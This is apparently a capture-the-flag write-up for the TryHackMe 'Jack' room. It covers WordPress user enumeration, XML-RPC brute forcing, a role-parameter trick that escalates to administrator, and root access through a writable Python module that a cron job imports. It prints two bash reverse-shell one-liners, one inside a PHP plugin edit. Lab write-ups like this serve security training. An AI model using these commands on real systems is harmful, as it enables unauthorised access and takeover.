Jack
May 11, 2021•345 words
Jack - THM
It's a Wordpress blog, so usual user enumeration vulnerability due to the error message. Wp-scan identifies three users (jack, danny & wendy). Look around a while, but it seems clear very quickly that you should try your hand at brute forcing (not a fan, don't like this in challenges). I don't know if there is a different intended way to gain access, but this worked (although it took some time). I would suggest a brute force against Xmlrpc, and don't use a huge wordlist (rockyou), something FASTter should do the trick.
Once you have access to Wordpress, you should realize you are no admin. Thankfully, this trick here might just get you admin access:
If you have a non admin account, try to intercept the update profile request and add "&ure_other_roles=administrator" in the parameters. This might give you administrative access.
With administrative access, you can add a line to one of the plugins and activate it to obtain a reverse shell. My line was:
<?php system('bash -c "bash -i >& /dev/tcp/<ip>/<port> 0>&1"');?>
Once inside, grab the flag and read the note. Search for what it tells you and you should find an SSH key that gives you access as jack. From there, check for hidden processes. Once you find it, you don't have many options to exploit. The only possibility would be to override the imported module... and that's the correct way to go. It is writable, so go and edit it to your liking to get a reverse shell whenever the cron job runs. There you have your root shell, and, of course, your flag.
Technical note: when you append to the module, what happens is that whenever the cron job runs it loads the whole module in its script (due to the "import <module_name>" line). Thanks to this, besides loading functions definitions and everything else, it will also execute your line of code as if it was already part of the job itself. The line I appended was:
system("bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'")